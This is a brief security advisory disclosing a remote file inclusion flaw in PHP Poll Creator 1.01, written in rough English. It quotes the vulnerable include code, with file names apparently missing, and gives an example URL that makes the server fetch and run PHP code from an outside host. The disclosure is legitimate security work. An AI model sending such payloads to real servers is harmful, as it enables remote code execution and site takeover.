svadvisory#6 -------------------------------------------------------------+ Title: PHP Injection in PHP Poll Creator | Software: PHP Poll Creator v 1.01 | Homepage: +------------+ Finder: rash | 24.05.05 | -------------------------------------------------------------+ Description -------------------------------------------------------------| Vulnerability has been found in file poll_vote.php <?php include $relativer_pfad . ""; include ($relativer_pfad . "lib/"); .... ?> one can implement any php code, what we need are it, a delivery the variable $relativer_pfad over URL, with which defintion our address to our file with php the code this file must absolutely is designated, otherwise cannot it not function where one this file put down are it no matter, main thing one give the exact address to the file with php the code to where them are. Example -------------------------------------------------------------| poll_vote.php?relativer_pfad=http://domain.tld/dir/ Conclusion -------------------------------------------------------------| as I understood it, this is not any longer developed further script program, but I go of it out of that, all versions am concerned, but without guarantee. ############################################################# rash || Search Vulnerabilities Team ||